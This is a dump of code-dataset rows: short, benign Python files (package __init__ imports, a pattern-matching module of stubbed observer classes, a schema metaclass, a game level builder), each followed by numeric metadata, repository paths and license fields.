# import apis into api package
from thola_client.api.check_api import CheckApi
from thola_client.api.identify_api import IdentifyApi
from thola_client.api.read_api import ReadApi
| 26.111111
| 53
| 0.846809
| 36
| 235
| 5.222222
| 0.5
| 0.143617
| 0.239362
| 0.287234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004808
| 0.114894
| 235
| 8
| 54
| 29.375
| 0.899038
| 0.174468
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
35071121c211879551774ea67a1d13dc095fba03
| 34
|
py
|
Python
|
kerastuner/oracles/__init__.py
|
haifeng-jin/kt-legacy
|
15686b5e2d25b7094134d68956b2edce5dffa7a0
|
[
"Apache-2.0"
] | 1
|
2022-03-29T21:49:22.000Z
|
2022-03-29T21:49:22.000Z
|
kerastuner/oracles/__init__.py
|
haifeng-jin/kt-legacy
|
15686b5e2d25b7094134d68956b2edce5dffa7a0
|
[
"Apache-2.0"
] | null | null | null |
kerastuner/oracles/__init__.py
|
haifeng-jin/kt-legacy
|
15686b5e2d25b7094134d68956b2edce5dffa7a0
|
[
"Apache-2.0"
] | 1
|
2022-02-14T18:57:19.000Z
|
2022-02-14T18:57:19.000Z
|
from keras_tuner.oracles import *
| 17
| 33
| 0.823529
| 5
| 34
| 5.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3523a068f289afc2bdfb6601a7c270c2ebf47ac5
| 92
|
py
|
Python
|
tests/test_pyenv_feature_exec.py
|
dedale/pyenv-win
|
1c1a9448c9d6a4927d3102b42e43ccf9d6ab8fbe
|
[
"MIT"
] | 1
|
2021-04-21T01:49:07.000Z
|
2021-04-21T01:49:07.000Z
|
tests/test_pyenv_feature_exec.py
|
papercuptech/pyenv-win
|
6c51896809632d89d2852f8649ac627420f3fc68
|
[
"MIT"
] | null | null | null |
tests/test_pyenv_feature_exec.py
|
papercuptech/pyenv-win
|
6c51896809632d89d2852f8649ac627420f3fc68
|
[
"MIT"
] | null | null | null |
from test_pyenv import TestPyenvBase
class TestPyenvFeatureExec(TestPyenvBase):
pass
| 13.142857
| 42
| 0.815217
| 9
| 92
| 8.222222
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 92
| 6
| 43
| 15.333333
| 0.948718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
52b065ad296990be4c39067fc5a4301eae5fde5c
| 91
|
py
|
Python
|
sslib/shamir/__init__.py
|
Arthurlpgc/python-sslib
|
08699fea9119ae5ce66a7bbffb3521f8d3f14525
|
[
"MIT"
] | 9
|
2018-01-22T18:59:29.000Z
|
2021-12-26T20:44:52.000Z
|
sslib/shamir/__init__.py
|
Arthurlpgc/python-sslib
|
08699fea9119ae5ce66a7bbffb3521f8d3f14525
|
[
"MIT"
] | 2
|
2020-04-17T01:03:29.000Z
|
2022-01-09T21:41:38.000Z
|
sslib/shamir/__init__.py
|
Arthurlpgc/python-sslib
|
08699fea9119ae5ce66a7bbffb3521f8d3f14525
|
[
"MIT"
] | 6
|
2018-05-28T15:56:06.000Z
|
2021-12-08T18:48:18.000Z
|
from .shamir import split_secret, recover_secret, to_base64, from_base64, from_hex, to_hex
| 45.5
| 90
| 0.835165
| 15
| 91
| 4.666667
| 0.6
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 0.098901
| 91
| 1
| 91
| 91
| 0.804878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
52bc278b75566e9bdaf0090b6bf1e1497a65f76b
| 142
|
py
|
Python
|
shuttl/Templates/__init__.py
|
shuttl-io/shuttl-cms
|
50c85db0de42e901c371561270be6425cc65eccc
|
[
"MIT"
] | 2
|
2017-06-26T18:06:58.000Z
|
2017-10-11T21:45:29.000Z
|
shuttl/Templates/__init__.py
|
shuttl-io/shuttl-cms
|
50c85db0de42e901c371561270be6425cc65eccc
|
[
"MIT"
] | null | null | null |
shuttl/Templates/__init__.py
|
shuttl-io/shuttl-cms
|
50c85db0de42e901c371561270be6425cc65eccc
|
[
"MIT"
] | null | null | null |
# from app.loadModules import load_all_modules_from_dir
#
# load_all_modules_from_dir('Templates')
from .Tags import *
from .Loader import *
| 20.285714
| 55
| 0.795775
| 21
| 142
| 5
| 0.52381
| 0.133333
| 0.266667
| 0.342857
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119718
| 142
| 7
| 56
| 20.285714
| 0.84
| 0.647887
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
5e19549414814929493de6417cd267145efe3b0c
| 13,123
|
py
|
Python
|
mars/pattern_matching.py
|
TvrtkoSternak/MARS
|
4c1e5177b665f0f974b6c6efe548bde0d68986ae
|
[
"MIT"
] | null | null | null |
mars/pattern_matching.py
|
TvrtkoSternak/MARS
|
4c1e5177b665f0f974b6c6efe548bde0d68986ae
|
[
"MIT"
] | null | null | null |
mars/pattern_matching.py
|
TvrtkoSternak/MARS
|
4c1e5177b665f0f974b6c6efe548bde0d68986ae
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
from .pattern import Pattern
class Reader(ABC):
"""
This class corresponds to the Subject role in Observer pattern. It contains the collection of IListener objects and
methods for adding/removing them, along with the ability to notify them about change.
...
Attributes
----------
listeners : list of IListener
List of observers that are listening for changes
Methods
-------
public void notify(self)
Notifies all subscribed listeners about change.
public void subscribe(self, listener)
Adds the received IListener object to the list of subscribed listeners.
public void unsubscribe(self,listener)
Removes the received IListener object from the list of subscribed listeners.
"""
def __init__(self):
self.listeners = []
def notify(self):
"""
Notifies all subscribed listeners about change
"""
pass
def subscribe(self, listener):
"""
Adds the received IListener object to the list of subscribed listeners
Parameters
----------
listener : IListener
IListener to subscribe
"""
pass
def unsubscribe(self, listener):
"""
Removes the received IListener object from the list of subscribed listeners
Parameters
----------
listener: IListener
IListener to unsubscribe
"""
pass
class Recommender(Reader):
"""
This class corresponds to the Concrete Subject role in Observer pattern. Recommender is the core class which extends
Reader class. This object is the “keeper” of the uploaded code in the form of AST. Its responsibility is iterating
through the nodes and notifying all attached observers about the change of current node and requesting checking for
matches. Once all the nodes have been visited it returns the found recommendations. The found patterns can be parsed
into arbitrary format by providing appropriate IPatternParser object when instantiating Recommender object.
...
Attributes
----------
listeners : list of IListener
List of observers that are listening for changes
uploaded_ast : ast
AST of the code that needs to be matched
parser : IPatternParser
Parser used for parsing found matches into understandable format
Methods
-------
public __init__(self, parser)
Initialises Recommender object.
public void notify(self)
Notifies all subscribed listeners about change.
public void subscribe(self, listener)
Adds the received IListener object to the list of subscribed listeners.
public void unsubscribe(self,listener)
Removes the received IListener object from the list of subscribed listeners.
public File get_recommendations(self)
Finds the matches for uploaded code block and returns file with recommendations.
public void parse(self, pattern_matcher)
Parses the IPatternMatcher object into the format determined by the parser.
"""
def __init__(self, parser):
"""
Initialises Recommender object
Parameters
----------
parser : IPatternParser
Parser object for parsing matches
"""
super().__init__()
self.parser = parser
def get_recommendations(self):
"""
Finds the matches for uploaded code block and returns file with recommendations
Returns
-------
File
File with found recommendations
"""
pass
def parse(self, pattern_matcher):
"""
Parses the IPatternMatcher object into the format determined by the parser
Parameters
----------
pattern_matcher: IPatternMatcher
IPatternMatcher to be parsed
"""
pass
class IListener(ABC):
"""
This class corresponds to the Observer role in theObserver design pattern.
...
Methods
-------
public void update(self)
Performs the appropriate update operation for the concrete implementation
"""
@abstractmethod
def update(self):
"""
Performs the appropriate update operation for the concrete implementation
"""
pass
class IPatternFactory(ABC):
"""
This class describes classes that are used for creating IPatternMatcher objects. When the factory finds a match, it
creates all patterns that start with the found match.
...
Methods
-------
public IPatternMatcher create_pattern(self)
Creates IPatternMatcher object for the detected pattern.
"""
@abstractmethod
def create_pattern(self):
"""
Creates and returns IPatternMatcher object for the detected pattern.
Returns
-------
IPatternMatcher
IPatternMatcher that contains a Pattern that the concrete factory is responsible for creating.
"""
pass
class IPatternMatcher(ABC):
"""
This class is responsible for checking if two patterns match.
...
Attributes
----------
pattern : Pattern
Pattern object that is being checked against incoming patterns for matches
wildcard_matches : list of ast
List of ASTs that were matched to wildcard nodes in the IPatternMatcher Pattern object. Used later in parsing of
the matched patterns.
Methods
-------
public __init__(pattern)
Initialises IPatternMatcher with pattern to match
public bool check_match(self, node)
Check if the input node matches the IPatternMatcher node that is next in the pattern.
"""
def __init__(self, pattern):
"""
Initialises IPatternMatcher with pattern to match
Parameters
----------
pattern : Pattern
Pattern object that is being checked against incoming patterns for matches
"""
self.pattern = pattern
@abstractmethod
def check_match(self, node):
"""
Check if the input node matches the IPatternMatcher node that is next in the pattern.
Parameters
node: ast
AST node that is checked for match in next IPatternMatcher Pattern node
Returns
bool
True if the nodes match, false otherwise
"""
pass
class PatternFactoryListener(IPatternFactory, IPatternMatcher, IListener):
"""
This class corresponds to the Concrete Observer role in the Observer design pattern. It inherits from
IListener, IPatternMatcher and IPatternFactory. It is used for creating PatternListener objects. When update is
called it retrieves the current node from Recommender and checks for match. If the match is found, appropriate
PatternListener is created and subscribed to Recommender.
...
Attributes
----------
recommender : Recommender
Recommender object that the listener is listening to
pattern: Pattern
IPatternMatcher own Pattern object that is being checked against incoming patterns for matches
wildcard_matches: list of ast
List of ASTs that were matched to wildcard nodes in the IPatternMatcher Pattern object. Used later in parsing of
the matched patterns.
Methods
-------
public __init__(self, pattern, recommender)
Initialises PatternFactoryListener
public void update(self)
Method called by the Reader class. When this method is called PatternFactoryListener object retrieves the
current node from Recommender and checks for match, if the node matches then the PatternFactoryListener creates
a designated PatternListener.
public void create_pattern(self):
Creates and returns IPatternMatcher object for the detected pattern.
public bool check_match(self, node):
Check if the input node matches the IPatternMatcher node that is next in the pattern.
"""
def __init__(self, pattern, recommender):
"""
Initialises PatternFactoryListener.
Parameters
----------
pattern : Pattern
Pattern it is creating
recommender : Recommender
Recommender object that the listener is listening to.s
"""
pass
def update(self):
"""
Method called by the Reader class. When this method is called PatternFactoryListener object retrieves the
current node from Recommender and checks for match, if the node matches then the PatternFactoryListener creates
a designated PatternListener.
"""
pass
def create_pattern(self):
"""
Creates and returns IPatternMatcher object for the detected pattern.
Returns
-------
IPatternMatcher
IPatternMatcher that contains a Pattern that the concrete factory is responsible for creating
"""
pass
def check_match(self, node):
"""
Check if the input node matches the IPatternMatcher node that is next in the pattern.
Parameters
----------
node : ast
AST node that is checked for match in next IPatternMatcher Pattern node
Returns
-------
bool
True if the nodes match, false otherwise
"""
pass
class PatternListener(IListener, IPatternMatcher):
"""
This class corresponds to the Concrete Observer role in the Observer design pattern. It inherits from IListener and
IPatternMatcher. When the current node in Reader changes this class checks if the now new current node matches with
the pattern. If it does match, it goes on with checking. If it does not, it removes itself from the list of
listeners in the Reader.
...
Attributes
----------
recommender : Recommender
Recommender object that the listener is listening to
pattern : Pattern
IPatternMatcher own Pattern object that is being checked against incoming patterns for matches
wildcard_matches : list of ast
List of ASTs that were matched to wildcard nodes in the IPatternMatcher Pattern object. Used later in parsing of
the matched patterns
index : int
Index of the last checked node
Methods
-------
public __init__(self, pattern, recommender)
Initialises PatternListener
public void update(self)
Method called by the Reader class. When this method is called PatternListener object retrieves the current node
from Recommender and checks for match. If the node is not a match, then PatternListener unsubscribes from the
Reader.
If the pattern is a match there are two scenarios:
1) The matched node is the last node in the Pattern:
Pattern listener unsubscribes from the reader and requests parsing.
2) The matched node is not the last node in the pattern:
Pattern listener increments its internal node count and continues to listen for updates from the reader.
public void create_pattern(self)
Creates and returns IPatternMatcher object for the detected pattern.
public bool check_match(self, node)
Check if the input node matches the IPatternMatcher node that is next in the pattern.
public void unsubscribe(self)
Removes itself from the list of listeners in the associated Reader object.
"""
def __init__(self, pattern, recommender):
"""
Initialises PatternListener.
Parameters
----------
pattern : Pattern
Pattern it is matching
recommender : Recommender
Recommender object that the listener is listening to.s
"""
pass
def update(self):
"""
Method called by the Reader class. When this method is called PatternListener object retrieves the current node
from Recommender and checks for match. If the node is not a match, then PatternListener unsubscribes from the
Reader.
If the pattern is a match there are two scenarios:
1) The matched node is the last node in the Pattern:
Pattern listener unsubscribes from the reader and requests parsing.
2) The matched node is not the last node in the pattern:
Pattern listener increments its internal node count and continues to listen for updates from the reader.
"""
pass
def check_match(self, node):
"""
Check if the input node matches the IPatternMatcher node that is next in the pattern.
Parameters
----------
node : ast
AST node that is checked for match in next IPatternMatcher Pattern node
Returns
-------
bool
True if the nodes match, false otherwise
"""
pass
def unsubscribe(self):
"""
Removes itself from the list of listeners in the associated Reader object.
"""
pass
| 33.391858
| 120
| 0.657319
| 1,512
| 13,123
| 5.665344
| 0.125
| 0.013308
| 0.014009
| 0.018212
| 0.768153
| 0.761616
| 0.711767
| 0.690988
| 0.685034
| 0.680364
| 0
| 0.00043
| 0.290559
| 13,123
| 393
| 121
| 33.391858
| 0.919656
| 0.760192
| 0
| 0.568627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.372549
| false
| 0.313725
| 0.039216
| 0
| 0.54902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
eaa29bdbc614cc067a3532c32d265a26004eb206
| 172
|
py
|
Python
|
omniprint/dataloader/__init__.py
|
SunHaozhe/OmniPrint
|
63a01d3b5592844c7f84460a10cc5fedf3a04fe4
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 8
|
2021-01-20T17:04:32.000Z
|
2022-01-24T03:22:51.000Z
|
omniprint/dataloader/__init__.py
|
SunHaozhe/OmniPrint
|
63a01d3b5592844c7f84460a10cc5fedf3a04fe4
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
omniprint/dataloader/__init__.py
|
SunHaozhe/OmniPrint
|
63a01d3b5592844c7f84460a10cc5fedf3a04fe4
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2022-02-23T13:08:02.000Z
|
2022-02-23T13:08:02.000Z
|
from .omniglot_like_dataloader import OmniglotLikeDataloader
from .torch_datasets import MultilingualDataset
from .omniglot_like_Z_dataloader import OmniglotLikeZDataloader
| 57.333333
| 63
| 0.918605
| 18
| 172
| 8.444444
| 0.611111
| 0.157895
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063953
| 172
| 3
| 63
| 57.333333
| 0.944099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
eaddac6c5db2afe815269fd0d28ca154ecea9999
| 37
|
py
|
Python
|
pyARC/RunNestedSamplingDef.py
|
tomevans/pyARC
|
935e3d9b49bca36433e4fb85a43c42b1d10d561d
|
[
"MIT"
] | null | null | null |
pyARC/RunNestedSamplingDef.py
|
tomevans/pyARC
|
935e3d9b49bca36433e4fb85a43c42b1d10d561d
|
[
"MIT"
] | null | null | null |
pyARC/RunNestedSamplingDef.py
|
tomevans/pyARC
|
935e3d9b49bca36433e4fb85a43c42b1d10d561d
|
[
"MIT"
] | null | null | null |
def Main( ARC ):
return None
| 5.285714
| 16
| 0.540541
| 5
| 37
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.378378
| 37
| 6
| 17
| 6.166667
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
eafd3741f9631eb546099a984b15f467c289aa45
| 71
|
py
|
Python
|
ctf/__init__.py
|
documentedai/capture-the-flag
|
4dbfba094f2a56a6b581098b603fe49a4515efb6
|
[
"BSD-3-Clause"
] | null | null | null |
ctf/__init__.py
|
documentedai/capture-the-flag
|
4dbfba094f2a56a6b581098b603fe49a4515efb6
|
[
"BSD-3-Clause"
] | 3
|
2020-04-22T01:12:06.000Z
|
2020-04-26T17:59:11.000Z
|
ctf/__init__.py
|
documentedai/capture-the-flag
|
4dbfba094f2a56a6b581098b603fe49a4515efb6
|
[
"BSD-3-Clause"
] | null | null | null |
from ctf.api import Ctf
from ctf.version import VERSION as __version__
| 23.666667
| 46
| 0.830986
| 12
| 71
| 4.583333
| 0.5
| 0.254545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140845
| 71
| 2
| 47
| 35.5
| 0.901639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d827e265dd61d84a64abe86078281dc791404557
| 77
|
py
|
Python
|
configs/exp_configs/__init__.py
|
ElementAI/data-augmentation-with-llms
|
23673ab55cfb72295468e92ae58d0906f5dc7b05
|
[
"Apache-2.0"
] | 2
|
2022-03-30T21:23:41.000Z
|
2022-03-31T10:00:07.000Z
|
configs/exp_configs/__init__.py
|
ElementAI/data-augmentation-with-llms
|
23673ab55cfb72295468e92ae58d0906f5dc7b05
|
[
"Apache-2.0"
] | null | null | null |
configs/exp_configs/__init__.py
|
ElementAI/data-augmentation-with-llms
|
23673ab55cfb72295468e92ae58d0906f5dc7b05
|
[
"Apache-2.0"
] | null | null | null |
from . import fs_exps
EXP_GROUPS = {}
EXP_GROUPS.update(fs_exps.EXP_GROUPS)
| 15.4
| 37
| 0.779221
| 13
| 77
| 4.230769
| 0.538462
| 0.490909
| 0.327273
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116883
| 77
| 4
| 38
| 19.25
| 0.808824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
dc22b1665dc9b51bb5bb3db59df9627295748a20
| 1,684
|
py
|
Python
|
typeit/schema/meta.py
|
avanov/type
|
dbf2a94de13b592987695b7346f10cbf53acf3af
|
[
"MIT"
] | 8
|
2018-06-17T16:01:12.000Z
|
2021-11-05T23:34:55.000Z
|
typeit/schema/meta.py
|
avanov/type
|
dbf2a94de13b592987695b7346f10cbf53acf3af
|
[
"MIT"
] | 71
|
2018-06-23T15:31:56.000Z
|
2021-03-09T16:56:50.000Z
|
typeit/schema/meta.py
|
avanov/type
|
dbf2a94de13b592987695b7346f10cbf53acf3af
|
[
"MIT"
] | 1
|
2021-11-05T23:34:57.000Z
|
2021-11-05T23:34:57.000Z
|
from typing import Type, NamedTuple, Tuple as PyTuple, Any
import colander as col
from pyrsistent import pvector
from pyrsistent.typing import PVector
from . import nodes
from ..combinator.combinator import Combinator
class TypeExtension(NamedTuple):
typ: Type
schema: PyTuple[Type['SchemaType'], PVector[Any]]
def __and__(self, other) -> Combinator:
return Combinator() & self & other
def __add__(self, other) -> 'TypeExtension':
return self._replace(
schema=(self.schema[0], self.schema[1].append(nodes.SchemaNode(other)))
)
class SubscriptableSchemaTypeM(type):
""" A metaclass for schemas that allow specifying types
for which they are defined during type construction composition.
The *M suffix in the name stands for "Meta" to indicate that
this class should be used only as a metaclass.
"""
def __getitem__(cls: Type['SchemaType'], item: Type) -> TypeExtension:
# ``cls`` is a schema type here
return TypeExtension(
typ=item,
schema=(cls, pvector()),
)
def __repr__(self) -> str:
return f'{self.__name__}'
__str__ = __repr__
class SchemaType(col.SchemaType, metaclass=SubscriptableSchemaTypeM):
pass
class Int(col.Int, metaclass=SubscriptableSchemaTypeM):
pass
class Bool(col.Bool, metaclass=SubscriptableSchemaTypeM):
pass
class Str(col.Str, metaclass=SubscriptableSchemaTypeM):
pass
class Float(col.Float, metaclass=SubscriptableSchemaTypeM):
pass
class Tuple(col.Tuple, metaclass=SubscriptableSchemaTypeM):
pass
class Mapping(col.Mapping, metaclass=SubscriptableSchemaTypeM):
pass
| 24.057143
| 83
| 0.701306
| 190
| 1,684
| 6.063158
| 0.389474
| 0.200521
| 0.224826
| 0.21875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001498
| 0.207245
| 1,684
| 69
| 84
| 24.405797
| 0.861423
| 0.152019
| 0
| 0.184211
| 0
| 0
| 0.034188
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0.184211
| 0.157895
| 0.105263
| 0.684211
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
dc49fac2038760e036d4b9da6d2f64f21e3cffb5
| 35
|
py
|
Python
|
Geo-localization/Model/__init__.py
|
kuihua/Explain_Metric_Learning
|
708c536102c59f3d5478bf17ea002704261e0a28
|
[
"MIT"
] | 2
|
2020-07-31T02:43:03.000Z
|
2020-07-31T14:56:52.000Z
|
Geo-localization/Model/__init__.py
|
kuihua/Explain_Metric_Learning
|
708c536102c59f3d5478bf17ea002704261e0a28
|
[
"MIT"
] | null | null | null |
Geo-localization/Model/__init__.py
|
kuihua/Explain_Metric_Learning
|
708c536102c59f3d5478bf17ea002704261e0a28
|
[
"MIT"
] | null | null | null |
from .models import Siamese_network
| 35
| 35
| 0.885714
| 5
| 35
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 35
| 1
| 35
| 35
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dc5898ffb5d6ff005a225b727289581f51553cb5
| 44
|
py
|
Python
|
feature_t.py
|
Anne-Fern/shazam-air
|
e51f9a11b896410599e9574417509646b962f86e
|
[
"MIT"
] | 19
|
2020-03-12T19:14:38.000Z
|
2022-03-22T19:51:55.000Z
|
feature_t.py
|
Anne-Fern/shazam-air
|
e51f9a11b896410599e9574417509646b962f86e
|
[
"MIT"
] | null | null | null |
feature_t.py
|
Anne-Fern/shazam-air
|
e51f9a11b896410599e9574417509646b962f86e
|
[
"MIT"
] | 3
|
2020-11-06T15:59:06.000Z
|
2021-08-11T08:59:05.000Z
|
import featureExtraction.feature as feature
| 22
| 43
| 0.886364
| 5
| 44
| 7.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 44
| 1
| 44
| 44
| 0.975
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dc6a28f998b0e308e376c26900e20ae87342c680
| 2,957
|
py
|
Python
|
utils/scripts/OOOlevelGen/src/daily_levels/185.py
|
fullscreennl/monkeyswipe
|
c56192e202674dd5ab18023f6cf14cf51e95fbd0
|
[
"MIT"
] | null | null | null |
utils/scripts/OOOlevelGen/src/daily_levels/185.py
|
fullscreennl/monkeyswipe
|
c56192e202674dd5ab18023f6cf14cf51e95fbd0
|
[
"MIT"
] | null | null | null |
utils/scripts/OOOlevelGen/src/daily_levels/185.py
|
fullscreennl/monkeyswipe
|
c56192e202674dd5ab18023f6cf14cf51e95fbd0
|
[
"MIT"
] | null | null | null |
import LevelBuilder
from sprites import *
def render(name,bg):
lb = LevelBuilder.LevelBuilder(name+".plist",background=bg)
lb.addObject(Beam.BeamSprite(x=397, y=30,width=27,height=6,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ).setName('axis1'))
lb.addObject(Beam.BeamSprite(x=461, y=30,width=27,height=6,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ).setName('axis2'))
lb.addObject(Hero.HeroSprite(x=429, y=55,width=32,height=32))
lb.addObject(Beam.BeamSprite(x=237, y=38,width=502,height=14,angle='-10',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=297, y=158,width=383,height=13,angle='10',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Friend.FriendSprite(x=397, y=30,width=20,height=20,angle='0',restitution=0.2,static='false',friction=0.8,density=20 ).setName('wheel1'))
lb.addObject(Friend.FriendSprite(x=461, y=30,width=20,height=20,angle='0',restitution=0.2,static='false',friction=0.8,density=20 ).setName('wheel2'))
lb.addObject(Joints.DistanceJoint(body1='Hero',body2='axis1',damping='0.2',freq='5'))
lb.addObject(Joints.DistanceJoint(body1='axis2',body2='axis1',damping='0.2',freq='5'))
lb.addObject(Joints.DistanceJoint(body1='axis2',body2='Hero',damping='0.2',freq='5'))
lb.addObject(Joints.RevoluteJoint(body1='axis1',body2='wheel1',motor_speed='50',enable_motor='true',torque='10000',lower_angle='12',upper_angle='50',enable_limit='false',collide_connected='false'))
lb.addObject(Joints.RevoluteJoint(body1='axis2',body2='wheel2',motor_speed='50',enable_motor='true',torque='10000',lower_angle='12',upper_angle='50',enable_limit='false',collide_connected='false'))
lb.addObject(Beam.BeamSprite(x=178, y=264,width=382,height=13,angle='-10',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Star.StarSprite(x=98, y=303,width=32,height=32))
